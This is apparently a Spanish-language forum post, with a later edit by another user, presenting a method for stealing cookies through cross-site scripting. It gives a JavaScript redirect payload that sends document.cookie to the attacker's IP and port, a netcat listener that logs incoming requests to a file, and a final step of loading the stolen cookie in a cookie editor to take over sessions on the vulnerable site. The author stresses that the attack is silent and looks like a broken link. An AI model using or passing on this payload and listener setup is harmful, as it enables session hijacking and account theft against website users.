Este metodo lo e descubierto jugoteando por la RED como siempre , no hace falta ningun hosting, no hace falta php, en realidad solo nos hace falta nuestro amado programa NetCat que haunque ya obsoleto sigue demostrando lo grande que es jejejeje
Os cuento, estaba hasta los huevos de los hosting y tal y tal entre otras cosas por que no consguia nada de nada y pense en lanzar mi netcat en modo servidor en mi computadora tal que asi
nc -v -l -p puerto
Luego no hay nada mas que realizar la redireccion especificando el puerto de destino y el viejo DOS escupira las cookies
document.location="
http://DireccionIP:Puerto"+document.cookie;
Este code es muy eficaz y silencioso no levanta sospechas pues como netcat no contesta nada, nada se habre y da la apariencia de un enlace roto.
Los usuarios de windows podemos sacarle el maximo jugo poniendolo en escucha recursiva tal que asi
nc -v -l -p puerto >> cabeceras.txt
De esta forma podremos dejar nuestra trampa habierta durante horas pues de la otra manera en cuanto reciva una conexion se cerrara y no seguira funcionando y la rediceccion en la pag dara error
De ahora en adelante el robo de cookies sera pan comido y sin ninguna complicacion en un minuto la tienes en casa XD!!
Espero que os haya gustado el metodo, como no e visto nada parecido en la red me atribuio su descubrimiento
Un saludo gente
---------------------------------------------------------------------------------------------------
EDITO: "MainFox"
Este metodo si existia ya, y donde dice:
document.location="http://DireccionIP:Puerto"+document.cookie;
Lo que hace es pedir la cookie y la lleva a DireccionIP: Nuestra IP publica y Puerto: el puerto que pusimos a la escucha con NETCAT.
nc -v -l -p puerto >> cabeceras.txt
cabeceras.txt > donde se guarda la cookie para encontrarla simplemente: open cabeceras.txt o INICIO: BUSCAR: cabeceras.txt
Luego podemos usar un editor de cookies para usarla en la web vulnerable a xss.
--------------
Lo aclare porque de donde lo saque tenian esta duda... por si surge.
MUY BUEN METODO
